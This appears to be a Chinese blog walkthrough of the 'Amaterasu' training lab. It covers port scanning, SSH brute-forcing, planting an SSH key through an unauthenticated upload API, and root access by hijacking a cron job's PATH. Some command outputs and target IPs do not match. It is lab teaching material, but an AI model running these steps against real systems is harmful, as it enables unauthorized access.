OSCP-Esay-Amaterasu保姆级
Amaterasu-Esay难度
准备工作
启动靶机
启动VPN
目标确认
获取目标机器IP > 192.168.244.249
利用ip a 获取攻击机IP > 192.168.45.168
端口收集-端口扫描
目标开放端口收集
- Nmap开放端口扫描2次
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap --min-rate 10000 -p- 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:08 CST
Nmap scan report for 192.168.244.249
Host is up (0.26s latency).
Not shown: 65524 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open unknown
33414/tcp open unknown
40080/tcp open unknown
[!通过各两次扫描收集到端口 ]
👉21,22,111,139,443,445,2049,10000,25022,33414,40080
目标端口对应服务探测
# tcp探测
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# sudo nmap -sT -sV -O -sC -p21,22,111,139,443,445,2049,10000,25022,33414,40080 192.168.244.249
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:12 CST
Nmap scan report for 192.168.244.249 Host is up (0.26s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.168 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text
22/tcp closed ssh
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
2049/tcp closed nfs
10000/tcp closed snet-sensor-mgmt
25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey:
| 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)
|_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)
33414/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 404 NOT FOUND
| Server: Werkzeug/2.2.3 Python/3.9.13
| Date: Fri, 21 Jul 2023 16:12:42 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 207
| Connection: close
| <!doctype html>
| <html lang=en>
| <title>404 Not Found</title>
40080/tcp open http Apache httpd 2.4.53 ((Fedora))
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.53 (Fedora)
|_http-title: My test page
信息收集-端口测试
总体来看的话,开放了4个端口🤔
21-ftp、25022-ssh、33414-tcp、40080-http
21-FTP端口的信息收集
21-FTP版本版本信息(确认)
通过Nmap探测获得FTP的版本信息,可以大致推测FTP的配置文件位置
# 如果探测版本为vsftpd 3.0.3
cat /etc/vsftpd.conf
21-FTP端口匿名登录测试(存在)
尝试匿名账号anonymous以及无密码进行登录测试
# 利用ftp协议+ip进行连接测试
ftp 192.168.244.249
Name: anonymous
21-FTP端口-文件GET收集(失败)
登录FTP之后利用ls查看存在哪些目录,翻阅的同时查看一下文件权限
利用GET下载文件
# binary 以二进制模式传输文件,保证文件完整
ftp > binary
# 查看目录结构
ftp > ls -al
进入了扩展模式,没东西
25022-SSH端口的信息收集
目标 ssh 192.168.244.249:25022
25022-SSH弱口令爆破(失败)
尝试root账户的密码爆破,利用工具hydra,线程-t为4
hydra -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.242.249 ssh -t4 -s 25022
![![[Pasted image 20230722212743.png]]](https://img-blog.csdnimg.cn/3f20c7d3f0cf409ab1fcddc5cccaf851.png)
放着持续爆破,我们进行下一项内容
25022-SSH手动登录尝试(失败)
尝试root账户的密码爆破发现报错之后进行手动尝试
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh root@192.168.242.249 -p 25022
root@192.168.242.249's password:
Permission denied, please try again.
![![[Pasted image 20230722212208.png]]](https://img-blog.csdnimg.cn/9df8d2c2fde34483ad7f98c48b8e0ee7.png)
33414端口信息收集
http://192.168.242.249:33414
根据nmap探测信息33414是一个tcp协议,可以http访问
![![[Pasted image 20230722212412.png]]](https://img-blog.csdnimg.cn/5d49c9d447b64a2da06e17d70532794b.png)
当访问了之后发现显示的是不能直接进行访问
![![[Pasted image 20230722212438.png]]](https://img-blog.csdnimg.cn/b34fe2c157e2463b997c32f118c107a7.png)
这时候简单的进行了chatgpt问答确定Werkzeug是什么,决定使用目录扫描
Werkzeug是一个Python的WSGI工具库,用于构建Web应用程序和框架。Werkzeug提供了一套灵活的工具,用于处理HTTP请求和响应、路由请求、处理会话、进行调试等等。
信息收集-dirsearch基础目录扫描
dirsearch -u http://192.168.242.249:33414 -x 302,403
发现了help和info接口
![![[Pasted image 20230722213325.png]]](https://img-blog.csdnimg.cn/b0cea758646b42879840329c4ffb76bc.png)
信息收集-dirsearch深度目录扫描(待选)
先看一下help和info接口有无信息吧,没有的话可以考虑挂着深度扫描
信息收集-目录访问
- 在http://192.168.242.249:33414/help端点中发现4个接口信息
![![[Pasted image 20230722213522.png]]](https://img-blog.csdnimg.cn/48044eb4dbe046a0a65f7b6155d606f0.png)
0 "GET /info : General Info"
1 "GET /help : This listing"
2 "GET /file-list?dir=/tmp : List of the files"
3 "POST /file-upload : Upload files"
- 在http://192.168.242.249:33414/info端点发现了基础信息
![![[Pasted image 20230722213644.png]]](https://img-blog.csdnimg.cn/adeda9663da0461bb1793700503f34bb.png)
40080端口信息收集(待选)
访问 http://192.168.242.249:40080 是火狐的一个界面。首先探索一下33414
![![[Pasted image 20230722213755.png]]](https://img-blog.csdnimg.cn/fc97a159075c44b38d682b788b839289.png)
漏洞利用-getwebshell
/file-list端点探索
端点/file-list?dir=/tmp下发现了文件信息
![![[Pasted image 20230722214305.png]]](https://img-blog.csdnimg.cn/228a7d5e7ab0444dad2d7f6e1e6ca5f6.png)
![![[Pasted image 20230722214007.png]]](https://img-blog.csdnimg.cn/3887e6203bf64f279eafebeae8b340c7.png)
/tmp是缓存目录,尝试修改dir到其他目录,发现成功
![![[Pasted image 20230722214318.png]]](https://img-blog.csdnimg.cn/2651bced18db4c748061e7ae6b508b1e.png)
![![[Pasted image 20230722214109.png]]](https://img-blog.csdnimg.cn/f3f0d174b50143f8b2497699260dd3a4.png)
说明该功能点是具有读取路径的功能,尝试文件读取,发现失败
![![[Pasted image 20230722214335.png]]](https://img-blog.csdnimg.cn/acf2bfb00cb544c79ff7164dcd99dba5.png)
![![[Pasted image 20230722214148.png]]](https://img-blog.csdnimg.cn/3f893b3e8ef643119ef456a0ffc6d7fb.png)
/file-upload端点探索
可以确认是一个上传功能点
curl http://192.168.242.249:33414/file-upload
![![[Pasted image 20230722214434.png]]](https://img-blog.csdnimg.cn/63c76571dc2f4425a2646badd4083baf.png)
# GET模式不允许的我们改成POST
curl -X POST http://192.168.242.249:33414/file-upload
![![[Pasted image 20230722214632.png]]](https://img-blog.csdnimg.cn/2dd443dfe00a44ff93d49d6b18198c75.png)
问了一下chatgpt得到的结论是需要-F "file=@/path/to/file"
# 创建一个文件
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# touch test.abcd
# 上传
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" http://192.168.242.249:33414/file-upload
{"message":"No filename part in the request"}
![![[Pasted image 20230722215320.png]]](https://img-blog.csdnimg.cn/5db8d07259bd43298ba5298d6e4bc02b.png)
# No filename part 需要文件名
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" -F filename=a http://192.168.242.249:33414/file-upload
{"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}
![![[Pasted image 20230722215727.png]]](https://img-blog.csdnimg.cn/64319335ed3f480f91bc00588d889c13.png)
根据需求尝试进行修改
# 上传的文件名必须符合白名单
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
![![[Pasted image 20230722215850.png]]](https://img-blog.csdnimg.cn/e3a8119d8ef546eb9c9184fe6443c298.png)
查看了一下文件上传的位置,发现是在/tmp目录下
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/tmp
["a.txt",....]
![![[Pasted image 20230722220038.png]]](https://img-blog.csdnimg.cn/5d07f5240e6d43d1aa8a8ac979f0f3c1.png)
端点漏洞利用
如果存在上传以及读取有哪些利用方式呢?
上传可以覆盖一些文件让我们登录,确认是否可以上传目录穿越
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=../a.txt http://192.168.242.249:33414/file-upload
<!doctype html>
<html lang=en>
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>
![![[Pasted image 20230722220331.png]]](https://img-blog.csdnimg.cn/46987a2dbf6441a9b66c7c9cf978fe04.png)
错误是无法完成请求,说明尝试写入到根目录中,没有权限
利用路径读取寻找有用的写入点,除了tmp之外应该还有用户权限的地方可以写入
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home
["alfredo"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo
[".bash_logout",".bash_profile",".bashrc","local.txt",".ssh","restapi",".bash_history"]
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub"]
发现存在alfredo的用户,存在.ssh的文件夹,可以尝试该文件夹是否可以上传
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=/home/alfredo/.ssh/a.txt http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh
["id_rsa","id_rsa.pub","a.txt"]
![![[Pasted image 20230722220949.png]]](https://img-blog.csdnimg.cn/cd80f50f725948baaabf3a3945de1894.png)
考虑上传攻击机的authorized_keys到alfredo的用户,进行密钥ssh登录
首先在攻击机上生成对应的密钥对
ssh-keygen -t rsa
...
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
text.txt text.txt.pub
![![[Pasted image 20230722221930.png]]](https://img-blog.csdnimg.cn/cf7e1a2dcbcd4bcf90f420f6183c853d.png)
接着在文件上传点尝试上传id_rsa_test.pub
利用目录穿越的方式将其上传到/home/alfredo/.ssh/authorized_keys
# 先修改白名单后缀
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# mv text.txt.pub text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ls
hydra.restore text.txt text.txt.txt
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# curl -X POST -F file="@/home/bachang/Amaterasu/text.txt.txt" -F filename=/home/alfredo/.ssh/authorized_keys http://192.168.242.249:33414/file-upload
{"message":"File successfully uploaded"}
![![[Pasted image 20230722222152.png]]](https://img-blog.csdnimg.cn/4795e7eb9de142b69e889e82365bee26.png)
同时在file-list接口也成功列出来我们上传的公钥文件
![![[Pasted image 20230722222222.png]]](https://img-blog.csdnimg.cn/6d8a2c65314a48dca8656c9a58d85ae0.png)
内网遨游-getshell
SSH密钥登录
获取密钥之后指定密钥进行登录
┌──(root㉿Kali)-[/home/bachang/Amaterasu]
└─# ssh -i text.txt alfredo@192.168.242.249 -p25022
Last login: Tue Mar 28 03:21:25 2023
[alfredo@fedora ~]$
FLAG1获取
[alfredo@fedora ~]$ find / -name local.txt 2>/dev/null
/home/alfredo/local.txt
[alfredo@fedora ~]$ cat /home/alfredo/local.txt
*****************************************
![![[Pasted image 20230722222402.png]]](https://img-blog.csdnimg.cn/93c395cae2af40c4b1d849b03acaa12a.png)
权限提升
Linux提权-sudo提权尝试(无)
查找具有sudo权限,且不需要密码的可提权文件
# 利用sudo -l寻找
sudo -l
发现需要密码
![![[Pasted image 20230722222440.png]]](https://img-blog.csdnimg.cn/70eefe6ea8cc43119467c960b885a4a6.png)
Linux提权-suid提权尝试(无)
# -perm 文件权限
[alfredo@fedora ~]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/staprun
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/cockpit-session
没找到什么比较好的提权内容
Linux提权-suid-getcap提权尝试(无)
# 探查有CAP_SETUID标志的进程
[alfredo@fedora ~]$ /usr/sbin/getcap -r / 2>/dev/null
/usr/bin/newgidmap cap_setgid=ep
/usr/bin/newuidmap cap_setuid=ep
/usr/bin/arping cap_net_raw=p
/usr/bin/clockdiff cap_net_raw=p
/usr/sbin/suexec cap_setgid,cap_setuid=ep
/usr/sbin/mtr-packet cap_net_raw=ep
Linux提权-Cron job提权尝试
/etc/crontab提权
# 寻找定时任务并修改进行提权
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/1 * * * * root /usr/local/bin/backup-flask.sh
发现每过一分钟会以执行一次backup-flask.sh
# 确定我们是否可以改
[alfredo@fedora ~]$ ls -al cat /usr/local/bin/backup-flask.sh
ls: cannot access 'cat': No such file or directory
-rwxr-xr-x. 1 root root 106 Mar 28 03:18 /usr/local/bin/backup-flask.sh
# 查看内容
[alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh
#!/bin/sh
export PATH="/home/alfredo/restapi:$PATH"
cd /home/alfredo/restapi
tar czf /tmp/flask.tar.gz *
backup-flask.sh会将用户下设置成环境变量并且执行一次tar
因为我们用户环境可控,所以我们自己做一个tar的命令进行任务计划帮助提权
可以做一个反弹shell(失败)
提升bash的suid
# 查看bash权限
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxr-xr-x. 1 root root 1390080 Jan 25 2021 /bin/bash
# 写一个提bash权命令 增加suid
[alfredo@fedora restapi]$ echo "chmod +u+s /bin/bash" > tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
# 增加执行权限
[alfredo@fedora restapi]$ chmod +x tar
[alfredo@fedora restapi]$ cat tar
chmod 777 /bin/bash
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021
# 成功提升权限
[alfredo@fedora restapi]$ ls -al /bin/bash
-rwxrwxrwx. 1 root root 1390080 Jan 25 2021 /bin/bash
# bash -p 获得权限
[alfredo@fedora restapi]$ bash -p
bash-5.1# whoami
root
可以把密钥cp到root中直接免密登录(懒)
FLAG2获取
bash-5.1# cat /root/proof.txt
**********************************
1353
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
